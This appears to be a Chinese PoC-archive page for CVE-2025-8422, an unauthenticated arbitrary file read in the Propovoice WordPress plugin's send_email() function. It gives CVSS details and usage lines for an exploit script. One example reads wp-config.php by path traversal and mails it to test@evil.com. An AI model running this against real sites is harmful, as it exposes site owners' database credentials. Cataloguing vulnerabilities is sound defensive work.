目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2025-8422 PoC — WordPress plugin Propovoice 安全漏洞

来源
关联漏洞
标题: WordPress plugin Propovoice 安全漏洞 (CVE-2025-8422)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Propovoice 1.7.6.7及之前版本存在安全漏洞,该漏洞源于send_email函数存在任意文件读取问题,可能导致未经验证的攻击者读取服务器上的敏感信息。
Description
Propovoice <= 1.7.6.7 - Unauthenticated Arbitrary File Read
介绍
# CVE-2025-8422
Propovoice <= 1.7.6.7 - Unauthenticated Arbitrary File Read

# Description

The Propovoice: All-in-One Client Management System plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.7.6.7 via the send_email() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.

## Details

- **Type**: plugin
- **Slug**: propovoice
- **Affected Version**: 1.7.6.7
- **CVSS Score**: 7.5
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **CVE**: CVE-2025-8422
- **Status**: Closed

POC
---
```
Usage: python3 cve-2025-8422-exploit.py <target_url> <email_recipient> [target_file]

Examples:
  python3 cve-2025-8422-exploit.py https://example.com admin@example.com
  python3 cve-2025-8422-exploit.py https://example.com test@evil.com /../../../wp-config.php
  ```
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →